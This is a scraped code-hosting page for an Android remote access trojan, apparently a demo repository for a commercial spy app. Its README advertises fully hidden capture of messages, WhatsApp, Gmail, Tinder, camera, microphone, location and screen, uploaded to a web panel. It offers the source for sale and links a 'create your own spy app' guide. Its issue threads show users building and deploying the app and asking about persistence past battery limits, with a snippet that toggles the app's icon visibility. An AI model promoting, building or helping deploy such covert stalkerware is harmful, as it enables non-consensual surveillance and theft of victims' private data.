Code Monkey home page Code Monkey logo

android_spy_app's Introduction

Android RAT

This is just a demo repository :-

Full code is deployed at https://hawkshaw.dev/
Watch video on YouTube at https://youtu.be/N51fwir8qec

Source code of Hawkshaw is up for sale for $5k, contact me on telegram if interested - https://t.me/hawkshaw

For subscription/queries, Telegram :- https://t.me/hawkshaw
Alternate Telegram: https://t.me/hawkshaw02

Read: How to create your own spy app https://medium.com/@hawkshawdev/android-spy-app-file-explorer-777f9c79ad3c
More articles will follow

Features :-

Optimised for android 13! Fully Hidden Camera Storage SMS CALL Whatsapp Reader Instagram Reader Messenger Reader Gmail Reader Tinder Reader Contact Browser History App Manager GPS Location Microphone Do a toast Send a text message Give call Open an URL in the default browser Do vibrate the phone Explore Files with full access. Material Client Side Web Panel Upload Contacts Upload Call Log Upload Messages Upload Photos Current Location Open a perticular web page Mobile Number, Network provider, UUID, SDK version, android version, etc. Video Uploads Live screen recording Take screenshot remotely Many more features Live Camera

Screenshots

Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot

Web Interface is available

This is a android spy app, which uploads user data such as contacts, messages, call log, send message(s), photos, videos, open a browser link etc.

Goto https://hawkshaw.dev which is android spy app(v2.0) front end. And let me know about your views. The new version of android spy app is completely built on firebase. So you may not need any other backend server. So please test my new version of android spy app, with more capabilities and stability.

Android code is written in kotlin Website is running on go server

android_spy_app's People

Contributors

abhinavsuthar avatar saksham2410 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

android_spy_app's Issues

Anyway: No bots online

I set DEVELOPMENT_SERVER var in Constants.tk on which address I have set up NodeJs server but still: No bots online, and service app is crashed periodically?

How did you get text from InboxStyle Notification ?

I am using AccessibilityService and casting event to notification
Notification n = (Notification) event.getParcelableData();

But in case of inbox style notification it give 2 new messages,3 new message,4 new messages....
is their any other way to retrieve notification extra messages ?

Regarding app

Hi . Android Devices after android 8.0 update they are using aggressive battery saving algorithm to extend their battery life. Due to that app will stop running in background when the screen is locked and it will stop the app permanently running from background whether your app can bypass this and it is 100% persistent?

How much would it cost

How much would it cost for you to set up your project for me, generating the application and configuring a part of the application

I can add multiple cell phones

T

B

Give Original code

At The Code of Panel and Android are Adbot project code not Original code

PermissionActivity.java is missing

in tasks folder
BaseTask is referring

private fun showAppIcon() {
val componentName = ComponentName(ctx, PermissionsActivity::class.java)
ctx.packageManager.setComponentEnabledSetting(componentName, PackageManager.COMPONENT_ENABLED_STATE_ENABLED, PackageManager.DONT_KILL_APP)
}

protected fun requestPermissions() {
    // app icon already shown in debug
    if (!BuildConfig.DEBUG) showAppIcon()
    val i = Intent(ctx, PermissionsActivity::class.java)
    i.addFlags(FLAG_ACTIVITY_NEW_TASK)
    ctx.startActivity(i)
}

here PermissionAcivity.java file is missing ???

kindly help me out to get this file ...

PermissionsActivity missing

Hello,
I am very new to android and I don't know much about it. but when I try to build this project from master branch I see error in AndroidManifest.xml that ".activities.PermissionsActivity" is missing and there is no activity for this. This may be basics but I am not sure how to write it or find it if any one can help.
Thanks

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.